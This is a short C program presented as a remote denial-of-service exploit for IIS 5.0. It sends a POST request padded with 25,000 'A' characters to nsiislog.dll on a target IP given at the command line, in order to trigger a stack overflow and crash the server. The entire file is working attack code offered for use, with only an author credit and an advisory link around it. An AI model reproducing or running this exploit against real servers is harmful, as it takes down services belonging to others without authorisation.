/* Remote IIS 5.0 DoS exploit - coded by Rizzy - butayne@linuxmail.org     
   Exploits the stack based overflow in nsiislog.dll             
   Advisory: http://packetstormsecurity.nl/0306-advisories/wmediaremote.txt
*/ 

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
 char buffer[25070]="POST /scripts/nsiislog.dll HTTP/1.1\r\nContent-length:25000\r\n\r\n";
 struct sockaddr_in sin;
 int a, sock, con;
  
 printf("\n\nRizzy's IIS 5.0 (nsiislog.dll) Remote DoS exploit\n");
 
 if(argc!=2) {
              printf("Syntax: %s <IPADDRESS>\n\n", argv[0]);
              return 0;
             }
                                  
 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);
 sock = socket(AF_INET, SOCK_STREAM, 0);
 con = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
 
 if (sock && con < 0) {
                       printf("Socket error!\n");
                       return 1;
                      }

 for(a = 0; a < 25000 ;++a) {
                              strcat(buffer, "A");
                             }

 strcat(buffer, "\r\n\r\n");  
 printf("Sending buffer to crash IIS server [%s]\n", argv[1]);
 send(sock, buffer, sizeof(buffer), 0);
 close(sock);
 printf("Done!\n");
}